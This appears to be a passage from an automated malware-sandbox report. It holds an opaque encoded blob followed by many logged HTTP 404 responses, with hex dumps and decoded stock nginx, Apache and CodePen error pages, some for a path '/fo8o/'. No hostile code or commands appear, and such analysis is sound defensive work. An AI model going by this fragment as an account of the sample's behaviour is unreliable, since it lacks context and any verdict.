FBEd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffErc+h9QwpYEKAkwFReofHK4xUBP
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 08:49:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 08:49:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:19 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:25 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:01 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:04 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:14.0491826Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:11 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:16.9082388Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:41 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:44 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:47 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:50 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
